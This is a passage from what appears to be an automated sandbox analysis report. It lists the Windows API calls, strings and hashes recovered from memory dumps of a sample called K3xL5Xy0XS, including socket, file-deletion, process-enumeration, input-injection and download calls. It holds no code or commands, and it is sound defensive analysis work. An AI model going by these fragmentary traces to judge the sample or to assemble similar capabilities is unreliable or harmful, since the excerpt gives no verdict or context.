                                                                                  • WSAGetLastError.WSOCK32 ref: 0024130D
                                                                                  • closesocket.WSOCK32(00000000), ref: 0024133C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                  • String ID:
                                                                                  • API String ID: 540024437-0
                                                                                  • Opcode ID: fe90bb9da302e6ecb2e658c097a36255eb54e04b664cc36c125bd6b6e32e67b0
                                                                                  • Instruction ID: d51963bb373b0957625f553bc9b6eafd247cf9a1a279c6c0009fdfbbf9920b1f
                                                                                  • Opcode Fuzzy Hash: fe90bb9da302e6ecb2e658c097a36255eb54e04b664cc36c125bd6b6e32e67b0
                                                                                  • Instruction Fuzzy Hash: 05418F316002119FD714DF64D489B2ABBE5AF56318F288188E8568F3D6C7B1EC91CBE1
                                                                                  APIs
                                                                                    • Part of subcall function 001C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001C3A97,?,?,001C2E7F,?,?,?,00000000), ref: 001C3AC2
                                                                                    • Part of subcall function 0022E199: GetFileAttributesW.KERNEL32(?,0022CF95), ref: 0022E19A
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0022D420
                                                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 0022D470
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0022D481
                                                                                  • FindClose.KERNEL32(00000000), ref: 0022D498
                                                                                  • FindClose.KERNEL32(00000000), ref: 0022D4A1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                  • String ID: \*.*
                                                                                  • API String ID: 2649000838-1173974218
                                                                                  • Opcode ID: 15e3f1cead4803ef8d3bcf2c8a828cfbd40c01cc7b0db7fe97b40e31957f16c4
                                                                                  • Instruction ID: f2e1481f23b4939776ab1653487172c7c873dd1693860ba26c39d1f319d9d3fc
                                                                                  • Opcode Fuzzy Hash: 15e3f1cead4803ef8d3bcf2c8a828cfbd40c01cc7b0db7fe97b40e31957f16c4
                                                                                  • Instruction Fuzzy Hash: 0A318F31018355AFC301EF60E856DAF77A8BEB1314F904A1DF4D593191EB30EA19CB66
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: __floor_pentium4
                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                  • API String ID: 4168288129-2761157908
                                                                                  • Opcode ID: e564f05ee1d861cebcb36325cc8fcf3047039842d6d2f936165ad305dd494c9c
                                                                                  • Instruction ID: 524396ee27dacdac76b44b9dcf4bffe387650c66f6d52e38e71aad917dea39dd
                                                                                  • Opcode Fuzzy Hash: e564f05ee1d861cebcb36325cc8fcf3047039842d6d2f936165ad305dd494c9c
                                                                                  • Instruction Fuzzy Hash: DFC22971E0862C8FDB29CE289D407EAB7B5EF44305F1541EAD94DE7251E7B4AE828F40
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 002364DC
                                                                                  • CoInitialize.OLE32(00000000), ref: 00236639
                                                                                  • CoCreateInstance.OLE32(0025FCF8,00000000,00000001,0025FB68,?), ref: 00236650
                                                                                  • CoUninitialize.OLE32 ref: 002368D4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                  • String ID: .lnk
                                                                                  • API String ID: 886957087-24824748
                                                                                  • Opcode ID: f4ee920d08b1942bd1faa7428d45ce5cdde05fdcc30c7a0c73165f528cf1e279
                                                                                  • Instruction ID: 576b9963a7c6f8fe7683deffe60ac4351fce3474f01b2d5828a4a6d473231478
                                                                                  • Opcode Fuzzy Hash: f4ee920d08b1942bd1faa7428d45ce5cdde05fdcc30c7a0c73165f528cf1e279
                                                                                  • Instruction Fuzzy Hash: 01D14A71518201AFC304EF24C885E6BB7E9FFA9704F50896DF5958B291EB70ED09CB92
                                                                                  APIs
                                                                                  • GetForegroundWindow.USER32(?,?,00000000), ref: 002422E8
                                                                                    • Part of subcall function 0023E4EC: GetWindowRect.USER32(?,?), ref: 0023E504
                                                                                  • GetDesktopWindow.USER32 ref: 00242312
                                                                                  • GetWindowRect.USER32(00000000), ref: 00242319
                                                                                  • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00242355
                                                                                  • GetCursorPos.USER32(?), ref: 00242381
                                                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002423DF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                  • String ID:
                                                                                  • API String ID: 2387181109-0
                                                                                  • Opcode ID: a8290f3bf0e9d4f989372fa25e42b4244de7c3538ae0f5859cf1dbfbab1437cc
                                                                                  • Instruction ID: 2ec5026c979a2f3c0643878ebbebe69f47002952e7041d0a486a474125ffcac8
                                                                                  • Opcode Fuzzy Hash: a8290f3bf0e9d4f989372fa25e42b4244de7c3538ae0f5859cf1dbfbab1437cc
                                                                                  • Instruction Fuzzy Hash: 37312072104316AFCB20DF55DC09B9BBBA9FFC8714F400919F984A7181EB34EA18CB96
                                                                                  APIs
                                                                                    • Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD
                                                                                  • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00239B78
                                                                                  • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00239C8B
                                                                                    • Part of subcall function 00233874: GetInputState.USER32 ref: 002338CB
                                                                                    • Part of subcall function 00233874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00233966
                                                                                  • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00239BA8
                                                                                  • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00239C75
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                  • String ID: *.*
                                                                                  • API String ID: 1972594611-438819550
                                                                                  • Opcode ID: d33f88fcf396db5602f1574c7022f26d1805d8d7ffc5041d8bbf9c05117ade60
                                                                                  • Instruction ID: 7d8ff9a1732d4af50ff4fc92115504303215c7c8a56d18486f2a8c4cbb0ce6f6
                                                                                  • Opcode Fuzzy Hash: d33f88fcf396db5602f1574c7022f26d1805d8d7ffc5041d8bbf9c05117ade60
                                                                                  • Instruction Fuzzy Hash: 7D41D3B191420B9FCF10DF64D889AEEBBB4FF1A315F24445AE805A3191EB709E94CF60
                                                                                  APIs
                                                                                    • Part of subcall function 001D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001D9BB2
                                                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 001D9A4E
                                                                                  • GetSysColor.USER32(0000000F), ref: 001D9B23
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 001D9B36
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$LongProcWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3131106179-0
                                                                                  • Opcode ID: 14c6e88ef0bead04412550f193ece941e265fae3668d7b41e7e090a6c25c71bf
                                                                                  • Instruction ID: caa4e9bcf361095519dc8819e08c8092d53e70acd5e4c202fd1ee1f4f755d998
                                                                                  • Opcode Fuzzy Hash: 14c6e88ef0bead04412550f193ece941e265fae3668d7b41e7e090a6c25c71bf
                                                                                  • Instruction Fuzzy Hash: 20A13771128541BFE728AE3D9C48EBB26ADDB92340F16020BF402C77D1DB359DA1D675
                                                                                  APIs
                                                                                    • Part of subcall function 0024304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0024307A
                                                                                    • Part of subcall function 0024304E: _wcslen.LIBCMT ref: 0024309B
                                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0024185D
                                                                                  • WSAGetLastError.WSOCK32 ref: 00241884
                                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 002418DB
                                                                                  • WSAGetLastError.WSOCK32 ref: 002418E6
                                                                                  • closesocket.WSOCK32(00000000), ref: 00241915
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                  • String ID:
                                                                                  • API String ID: 1601658205-0
                                                                                  • Opcode ID: d3b0ac7bd6b2a9565eda45315a0992fa2f9b1b0852447175b144b6ba4b40b745
                                                                                  • Instruction ID: 07d883a12ee1402dd5025993310426dab45cf1c1e0bdaea21dbb0a8535c150c4
                                                                                  • Opcode Fuzzy Hash: d3b0ac7bd6b2a9565eda45315a0992fa2f9b1b0852447175b144b6ba4b40b745
                                                                                  • Instruction Fuzzy Hash: 2751B471A00210AFEB15AF24D88AF2A77E5AB58718F14805CF9065F3D3D771ED51CBA1
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                  • String ID:
                                                                                  • API String ID: 292994002-0
                                                                                  • Opcode ID: 6a2797319577c2c2e6c16e3d990594ee6972b60759438644430a979021223713
                                                                                  • Instruction ID: a4ea424070adefa3eae84ad4e8d99ecde74be8e3c75bec7aaefea1666c1ed0e0
                                                                                  • Opcode Fuzzy Hash: 6a2797319577c2c2e6c16e3d990594ee6972b60759438644430a979021223713
                                                                                  • Instruction Fuzzy Hash: AC21D6317502015FD7208F1AD884F267BA5EF95317F18805DEC458B351D772EC66CB99
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                  • API String ID: 0-1546025612
                                                                                  • Opcode ID: 9ab4b670afd77cb5eca1a7ff6346393c85e416046946b264c2467a8962243a20
                                                                                  • Instruction ID: 06fc555b53f55e22fb4bd46e10d1994c0cf2df23e4e9e851ef4652de78383d2e
                                                                                  • Opcode Fuzzy Hash: 9ab4b670afd77cb5eca1a7ff6346393c85e416046946b264c2467a8962243a20
                                                                                  • Instruction Fuzzy Hash: EFA27370E1062ACBDF24CF58C884BAEB7B1BF64314F15819AD815A7285DB74DDA1CF50
                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 002282AA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen
                                                                                  • String ID: ($tb($|
                                                                                  • API String ID: 1659193697-4269497803
                                                                                  • Opcode ID: d3c4bdfffb3583820ee99d5cca0c8823dc35b2a4ea58b97dc2096245d7a6576a
                                                                                  • Instruction ID: ef1e7fbc248f29ebd2a131cda11426da263c28d648daa3716dfe91f1d672b909
                                                                                  • Opcode Fuzzy Hash: d3c4bdfffb3583820ee99d5cca0c8823dc35b2a4ea58b97dc2096245d7a6576a
                                                                                  • Instruction Fuzzy Hash: F8324674A11616AFC728CF59D080A6AB7F0FF48710B15C5AEE49ADB3A1EB70E951CB40
                                                                                  APIs
                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 0024A6AC
                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0024A6BA
                                                                                    • Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD
                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 0024A79C
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0024A7AB
                                                                                    • Part of subcall function 001DCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00203303,?), ref: 001DCE8A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 1991900642-0
                                                                                  • Opcode ID: 9c4ecd3a8e95cf23f0cf6c67483de61effc4214114a1137c5729543b33326a3d
                                                                                  • Instruction ID: 4080ad09220ae12587a77339c3f05ef8f1f75f0694eb140a992394ff4f1ec0ae
                                                                                  • Opcode Fuzzy Hash: 9c4ecd3a8e95cf23f0cf6c67483de61effc4214114a1137c5729543b33326a3d
                                                                                  • Instruction Fuzzy Hash: C4516B71508300AFD714EF24D886E6BBBE8FFA9754F40891DF58A97291EB30D904CB92
                                                                                  APIs
                                                                                  • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0022AAAC
                                                                                  • SetKeyboardState.USER32(00000080), ref: 0022AAC8
                                                                                  • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0022AB36
                                                                                  • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0022AB88
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                  • String ID:
                                                                                  • API String ID: 432972143-0
                                                                                  • Opcode ID: 944eec57c815033cf769c9c27211e683c296e7bfd1bc91a1faa09841c116acd6
                                                                                  • Instruction ID: 1f03c2e4478b34a8f89355527c152836a29daccb7199331301a580d1210e7446
                                                                                  • Opcode Fuzzy Hash: 944eec57c815033cf769c9c27211e683c296e7bfd1bc91a1faa09841c116acd6
                                                                                  • Instruction Fuzzy Hash: E3312C30A60329BFFB358FE4AC09BFA77A6AF54314F14421AF081565D0D37489A1CB52
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 001FBB7F
                                                                                    • Part of subcall function 001F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001FD7D1,00000000,00000000,00000000,00000000,?,001FD7F8,00000000,00000007,00000000,?,001FDBF5,00000000), ref: 001F29DE
                                                                                    • Part of subcall function 001F29C8: GetLastError.KERNEL32(00000000,?,001FD7D1,00000000,00000000,00000000,00000000,?,001FD7F8,00000000,00000007,00000000,?,001FDBF5,00000000,00000000), ref: 001F29F0
                                                                                  • GetTimeZoneInformation.KERNEL32 ref: 001FBB91
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,?,0029121C,000000FF,?,0000003F,?,?), ref: 001FBC09
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,?,00291270,000000FF,?,0000003F,?,?,?,0029121C,000000FF,?,0000003F,?,?), ref: 001FBC36
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                  • String ID:
                                                                                  • API String ID: 806657224-0
                                                                                  • Opcode ID: 997dbdb421df44c7fdaabd3383157d3d1302250b5024a1a50fcc50b23eb5699a
                                                                                  • Instruction ID: 198338a93ffac6d4fedbff37d19f8ebb4e2860dcc156a6ba2cad614a0df77aad
                                                                                  • Opcode Fuzzy Hash: 997dbdb421df44c7fdaabd3383157d3d1302250b5024a1a50fcc50b23eb5699a
                                                                                  • Instruction Fuzzy Hash: 5131B070D0821ADFCB15EF6AECC083ABBB8FF5675071442AAE664DB2A1D7309D10CB50
                                                                                  APIs
                                                                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 0023CE89
                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 0023CEEA
                                                                                  • SetEvent.KERNEL32(?,?,00000000), ref: 0023CEFE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorEventFileInternetLastRead
                                                                                  • String ID:
                                                                                  • API String ID: 234945975-0
                                                                                  • Opcode ID: 84801bac9b08f9329087fdb549163b2b07ff2e225dc8c67d40250aef066b3214
                                                                                  • Instruction ID: 9e2085cbacd4f48b79a98ea639ad8d3ae9480f93341a7d4561aa16b770064bf7
                                                                                  • Opcode Fuzzy Hash: 84801bac9b08f9329087fdb549163b2b07ff2e225dc8c67d40250aef066b3214
                                                                                  • Instruction Fuzzy Hash: 9B21EDB1510706AFD720DF65D948BAAB7FCEB10714F20442EE642E2151E770EE148B54
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00235CC1
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00235D17
                                                                                  • FindClose.KERNEL32(?), ref: 00235D5F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                  • String ID:
                                                                                  • API String ID: 3541575487-0
